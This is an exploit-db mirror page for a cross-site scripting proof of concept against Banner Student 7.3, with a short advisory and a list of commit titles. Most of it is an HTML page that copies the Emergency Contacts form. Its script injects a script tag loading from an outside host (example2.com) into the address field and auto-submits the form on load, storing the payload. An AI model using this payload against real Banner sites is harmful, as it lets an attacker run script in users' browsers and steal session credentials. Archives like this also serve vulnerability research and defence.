bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/java/webapps/31073.html
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

9 lines
No EOL
7.3 KiB
HTML
Raw Blame History

source: https://www.securityfocus.com/bid/27490/info
Banner Student is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Banner Student 7.3 is vulnerable; other versions may also be affected.
<html><head><title>Banner Vulnerability Test Case</title></head> <body> <FORM ACTION="https://www.example.com/ss/twbksrch.P_ShowResults" METHOD="POST"> Search <SPAN class=fieldlabeltextinvisible><LABEL for=keyword_in_id><SPAN class=fieldlabeltext>Search</SPAN></LABEL></SPAN> <INPUT TYPE="text" NAME="KEYWRD_IN" SIZE="20" MAXLENGTH="65" ID="keyword_in_id"> <INPUT TYPE="submit" VALUE="Go"> </FORM> </div> </TD> <TD CLASS="pldefault"><p class="rightaligntext"> <SPAN class="pageheaderlinks"> <A HREF="/ss/twbkwbis.P_GenMenu?name=bmenu.P_GenMnu" class="submenulinktext2" >RETURN TO MENU</A> | <A HREF="/ss/twbksite.P_DispSiteMap?menu_name_in=bmenu.P_MainMnu&depth_in=2&columns_in=3" accesskey="2" class="submenulinktext2">SITE MAP</A> | <A HREF="/wtlhelp/twbhhelp.htm" accesskey="H" onClick="popup = window.open('/wtlhelp/twbhhelp.htm', 'PopupPage','height=450,width=500,scrollbars=yes,resizable=yes'); return false" target="_blank" onMouseOver="window.status=''; return true" onMouseOut="window.status=''; return true"onFocus="window.status=''; return true" onBlur="window.status=''; return true" class="submenulinktext2">HELP</A> | <A HREF="twbkwbis.P_Logout" accesskey="3" class="submenulinktext2">EXIT</A> </span> </TD> </TR> </TABLE> </DIV> <DIV class="pagetitlediv"> <TABLE CLASS="plaintable" SUMMARY="This table displays title and static header displays." WIDTH="100%"> <TR> <TD CLASS="pldefault"> <H2>Update Emergency Contacts</H2> </TD> <TD CLASS="pldefault"> &nbsp; </TD> <TD CLASS="pldefault"><p class="rightaligntext"> <DIV class="staticheaders"> </div> </TD> </TR> <TR> <TD class="bg3" width="100%" colSpan=3><IMG SRC="/wtlgifs/web_transparent.gif" ALT="Transparent Image" TITLE="Transparent Image" NAME="web_transparent" HSPACE=0 VSPACE=0 BORDER=0 HEIGHT=3 WIDTH=10></TD> </TR> </TABLE> <a name="main_content"></a> </DIV> <DIV class="pagebodydiv"> <!-- ** END OF twbkwbis.P_OpenDoc ** --> <DIV class="infotextdiv"><TABLE CLASS="infotexttable" SUMMARY="This layout table contains information that may be helpful in understanding the content and functionality of this page. It could be a brief set of instructions, a description of error messages, or other special information."><TR><TD CLASS="indefault">&nbsp;</TD><TD CLASS="indefault"><SPAN class=infotext> Enter a new emergency contact. When finished, Submit Changes. </SPAN></TD></TR></TABLE><P></DIV> <FORM NAME="MyForm" ACTION="https://www.example.com:9170/ssINTG/bwgkoemr.P_UpdateEmrgContacts" METHOD="post"> <INPUT TYPE="hidden" NAME="oldpri" VALUE="2"> <INPUT TYPE="hidden" NAME="last_active" VALUE="20070821154753"> <TABLE CLASS="dataentrytable" SUMMARY="This layout table is used to format the Emergency Contacts form."> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=remove_id><SPAN class=fieldlabeltext>Remove Contact:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"><INPUT TYPE="checkbox" NAME="remove_it" ID="remove_id"></TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=priority_id><SPAN class=fieldlabeltext>Order:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="priority_in" SIZE="2" MAXLENGTH="1" VALUE="2" ID="priority_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=rship_id><SPAN class=fieldlabeltext>Relationship:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <SELECT NAME="rship" SIZE="1" ID="rship_id"> <OPTION VALUE="" SELECTED>Not Applicable <OPTION VALUE="A">An Ex-spouse </SELECT> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=fname_id><SPAN class=fieldlabeltext>First Name:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="fname" SIZE="20" MAXLENGTH="15" ID="fname_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=mi_id><SPAN class=fieldlabeltext>Middle Initial:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="mi" SIZE="2" MAXLENGTH="1" ID="mi_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=lname_id><SPAN class=fieldlabeltext>Last Name:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="lname" SIZE="35" MAXLENGTH="25" ID="lname_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=addr1_id><SPAN class=fieldlabeltext>Address Line 1:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="addr1" SIZE="35" MAXLENGTH="30" ID="addr1_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=addr2_id><SPAN class=fieldlabeltext>Address Line 2:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="addr2" SIZE="35" MAXLENGTH="30" ID="addr2_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=addr3_id><SPAN class=fieldlabeltext>Address Line 3:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="addr3" SIZE="35" MAXLENGTH="30" ID="addr3_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=city_id><SPAN class=fieldlabeltext>City:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="city" SIZE="30" MAXLENGTH="20" ID="city_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=stat_id><SPAN class=fieldlabeltext>State or Province:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <SELECT NAME="stat" SIZE="1" ID="stat_id"> <OPTION VALUE="" SELECTED>Not Applicable <OPTION VALUE="RI">Rhode Island </SELECT> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=zip_id><SPAN class=fieldlabeltext>Zip or Postal Code:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <INPUT TYPE="text" NAME="zip" SIZE="11" MAXLENGTH="10" ID="zip_id"> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=natn_id><SPAN class=fieldlabeltext>Country:</SPAN></LABEL></TD> <TD COLSPAN="5" CLASS="dedefault"> <SELECT NAME="natn" SIZE="1" ID="natn_id"> <OPTION VALUE="" SELECTED>Not Applicable OPTION VALUE="US">United States </SELECT> </TD> </TR> <TR> <TD CLASS="delabel" scope="row" ><LABEL for=area_id><SPAN class=fieldlabeltext>Area Code:</SPAN></LABEL></TD> <TD COLSPAN="1" CLASS="dedefault"> <INPUT TYPE="text" NAME="area" SIZE="4" MAXLENGTH="3" ID="area_id"> <TD CLASS="delabel" scope="row" ><LABEL for=phone_id><SPAN class=fieldlabeltext>Phone Number:</SPAN></LABEL></TD> <TD CLASS="dedefault"><INPUT TYPE="text" NAME="phone" SIZE="9" MAXLENGTH="8" ID="phone_id"></TD> <TD CLASS="delabel" scope="row" ><LABEL for=ext_id><SPAN class=fieldlabeltext>Extension:</SPAN></LABEL></TD> <TD CLASS="dedefault"><INPUT TYPE="text" NAME="ext" SIZE="5" MAXLENGTH="4" ID="ext_id"></TD> </TR> </TABLE> <P> <INPUT TYPE="submit" VALUE="Submit Changes"> <INPUT TYPE="reset" VALUE="Reset"> </FORM> <script> document.MyForm.addr1.value='\<script src=http://www.example2.com/s>'; document.MyForm.natn.value='US'; document.MyForm.stat.value='RI'; document.MyForm.fname.value='NAME'; document.MyForm.lname.value='NAME'; document.MyForm.city.value='Providence'; document.MyForm.zip.value='02912'; document.MyForm.submit(); </script> </body> </html>
Reference in a new issue View git blame Copy permalink